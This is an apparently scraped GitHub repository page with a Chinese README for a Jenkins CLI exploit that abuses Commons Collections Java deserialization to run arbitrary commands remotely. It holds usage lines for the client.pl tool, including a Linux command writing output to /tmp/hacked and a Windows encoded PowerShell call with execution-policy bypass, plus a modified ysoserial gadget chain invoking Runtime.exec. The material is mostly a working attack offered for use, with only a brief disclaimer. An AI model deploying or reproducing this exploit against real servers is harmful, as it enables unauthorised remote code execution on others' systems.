Jenkins CommonCollections Exploit
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
contrib
data
lib
README.md
client.pl

README.md

漏洞详情

http://tools.changesec.com/Jenkins-CommonCollections-Exploit/

jenkins-cli-exploit

花时间学了一下 transformer,这个版本支持任意命令!

安装环境

cpan IPC::Run

利用方法

./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'
./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'

来个截图,

截图

源代码

官方的 ysoserial 实现存在缺陷,不能正确执行任意命令,已经改掉,现在支持两个新的 Collection,

分别为,

CommonsCollections1Linux
CommonsCollections1Win

修改点,你懂的,

		final String[] execArgs = new String[] { "sh", "-c", command };
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String[].class }, new Object[] {
                        execArgs }),
				new ConstantTransformer(1) };

代码懒得上传了,直接用lib的就可以

Legal Disclaimer

Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.